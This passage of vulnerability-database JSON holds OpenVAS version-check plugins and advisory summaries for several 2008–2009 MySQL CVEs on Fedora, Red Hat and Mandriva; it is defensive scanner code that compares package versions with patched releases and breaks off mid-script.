"861651", "description": "Check for the Version of mysql", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "title": "Fedora Update for mysql FEDORA-2010-1348", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-7247", "CVE-2009-4019"], "modified": "2017-12-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861651", "id": "OPENVAS:861651", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mysql FEDORA-2010-1348\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mysql on Fedora 12\";\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. MySQL is a\n client/server implementation consisting of a server daemon (mysqld)\n and many different client programs and libraries. The base package\n contains the standard MySQL client programs and generic MySQL files.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034642.html\");\n script_id(861651);\n script_version(\"$Revision: 8037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 07:32:03 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-1348\");\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\");\n script_name(\"Fedora Update for mysql FEDORA-2010-1348\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.42~7.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:33:22", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034591.html", "2010-1300"], "pluginID": "861707", "description": "Check for the Version of mysql", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "title": "Fedora Update for mysql FEDORA-2010-1300", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-7247", "CVE-2009-4019"], "modified": "2017-12-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861707", "id": "OPENVAS:861707", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mysql FEDORA-2010-1300\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mysql on Fedora 11\";\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. MySQL is a\n client/server implementation consisting of a server daemon (mysqld)\n and many different client programs and libraries. The base package\n contains the standard MySQL client programs and generic MySQL files.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034591.html\");\n script_id(861707);\n script_version(\"$Revision: 8186 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 07:30:34 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-1300\");\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\");\n script_name(\"Fedora Update for mysql FEDORA-2010-1300\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.42~7.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-22T16:45:26", "references": ["http://www.securityfocus.com/bid/37075", "http://www.mysql.com/", "http://www.securityfocus.com/bid/37076", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html"], "pluginID": "1361412562310100356", "description": "MySQL is prone to a security-bypass vulnerability and to to a local\n privilege-escalation vulnerability.", "edition": 5, "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-11-20T00:00:00", "title": "MySQL multiple Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Databases", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310100356", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100356", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mysql_multiple_vuln.nasl 11884 2018-10-12 13:33:40Z cfischer $\n#\n# MySQL multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mysql:mysql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100356\");\n script_version(\"$Revision: 11884 $\");\n script_cve_id(\"CVE-2009-4028\", \"CVE-2009-4030\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 15:33:40 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-20 12:35:38 +0100 (Fri, 20 Nov 2009)\");\n script_bugtraq_id(37075, 37076);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"MySQL multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"mysql_version.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37076\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37075\");\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html\");\n script_xref(name:\"URL\", value:\"http://www.mysql.com/\");\n\n script_tag(name:\"summary\", value:\"MySQL is prone to a security-bypass vulnerability and to to a local\n privilege-escalation vulnerability.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit the security-bypass issue to bypass certain\n security restrictions and obtain sensitive information that may lead to further attacks.\n\n Local attackers can exploit the local privilege-escalation issue to\n gain elevated privileges on the affected computer.\");\n\n script_tag(name:\"affected\", value:\"Versions prior to MySQL 5.1.41 are vulnerable.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for details.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!ver = get_app_version(cpe:CPE, port:port)) exit(0);\n\nif(ver =~ \"^5\\.\" && version_is_less(version:ver, test_version:\"5.1.41\")) {\n report = report_fixed_ver(installed_version:ver, fixed_version:\"5.1.41\");\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-12T11:10:42", "references": ["https://www.redhat.com/archives/rhsa-announce/2010-February/msg00008.html", "2010:0109-01"], "pluginID": "870216", "description": "Check for the Version of mysql", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-02-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "RedHat Update for mysql RHSA-2010:0109-01", "type": "openvas", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "modified": "2017-12-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870216", "id": "OPENVAS:870216", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for mysql RHSA-2010:0109-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. It consists of\n the MySQL server daemon (mysqld) and many client programs and libraries.\n\n It was discovered that the MySQL client ignored certain SSL certificate\n verification errors when connecting to servers. A man-in-the-middle\n attacker could use this flaw to trick MySQL clients into connecting to a\n spoofed MySQL server. (CVE-2009-4028)\n \n Note: This fix may uncover previously hidden SSL configuration issues, such\n as incorrect CA certificates being used by clients or expired server\n certificates. This update should be carefully tested in deployments where\n SSL connections are used.\n \n A flaw was found in the way MySQL handled SELECT statements with subqueries\n in the WHERE clause, that assigned results to a user variable. A remote,\n authenticated attacker could use this flaw to crash the MySQL server daemon\n (mysqld). This issue only caused a temporary denial of service, as the\n MySQL daemon was automatically restarted after the crash. (CVE-2009-4019)\n \n When the "datadir" option was configured with a relative path, MySQL did\n not properly check paths used as arguments for the DATA DIRECTORY and INDEX\n DIRECTORY directives. An authenticated attacker could use this flaw to\n bypass the restriction preventing the use of subdirectories of the MySQL\n data directory being used as DATA DIRECTORY and INDEX DIRECTORY paths.\n (CVE-2009-4030)\n \n Note: Due to the security risks and previous security issues related to the\n use of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\n depending on this feature should consider disabling it by adding\n "symbolic-links=0" to the "[mysqld]" section of the "my.cnf" configuration\n file. In this update, an example of such a configuration was added to the\n default "my.cnf" file.\n \n All MySQL users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. After installing this\n update, the MySQL server daemon (mysqld) will be restarted automatically.\";\n\ntag_affected = \"mysql on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-February/msg00008.html\");\n script_id(870216);\n script_version(\"$Revision: 8037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 07:32:03 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-19 13:38:15 +0100 (Fri, 19 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0109-01\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\", \"CVE-2008-2079\", \"CVE-2008-4098\");\n script_name(\"RedHat Update for mysql RHSA-2010:0109-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-debuginfo\", rpm:\"mysql-debuginfo~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:32", "references": ["http://lists.mandriva.com/security-announce/2010-01/msg00053.php", "2010:012"], "pluginID": "830806", "description": "Check for the Version of mysql", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-01-19T00:00:00", "title": "Mandriva Update for mysql MDVSA-2010:012 (mysql)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "modified": "2017-12-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830806", "id": "OPENVAS:830806", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mysql MDVSA-2010:012 (mysql)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in mysql:\n\n mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does\n not (1) properly handle errors during execution of certain SELECT\n statements with subqueries, and does not (2) preserve certain\n null_value flags during execution of statements that use the\n GeomFromWKB function, which allows remote authenticated users to\n cause a denial of service (daemon crash) via a crafted statement\n (CVE-2009-4019).\n \n The vio_verify_callback function in viosslfactories.c in MySQL\n 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used,\n accepts a value of zero for the depth of X.509 certificates, which\n allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL\n servers via a crafted certificate, as demonstrated by a certificate\n presented by a server linked against the yaSSL library (CVE-2009-4028).\n \n MySQL 5.1.x before 5.1.41 allows local users to bypass certain\n privilege checks by calling CREATE TABLE on a MyISAM table with\n modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments\n that are originally associated with pathnames without symlinks,\n and that can point to tables created at a future time at which a\n pathname is modified to contain a symlink to a subdirectory of the\n MySQL data home directory, related to incorrect calculation of the\n mysql_unpacked_real_data_home value. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079\n (CVE-2009-4030).\n \n The updated packages have been patched to correct these\n issues. Additionally for 2009.1 and 2010.0 mysql has also been upgraded\n to the latest stable 5.1 release (5.1.42).\";\n\ntag_affected = \"mysql on Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00053.php\");\n script_id(830806);\n script_version(\"$Revision: 8243 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 07:30:04 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-19 08:58:46 +0100 (Tue, 19 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:012\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2008-4098\", \"CVE-2008-2079\", \"CVE-2009-4030\");\n script_name(\"Mandriva Update for mysql MDVSA-2010:012 (mysql)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql16\", rpm:\"libmysql16~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common-core\", rpm:\"mysql-common-core~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-core\", rpm:\"mysql-core~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql16\", rpm:\"lib64mysql16~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql16\", rpm:\"libmysql16~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql16\", rpm:\"lib64mysql16~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n 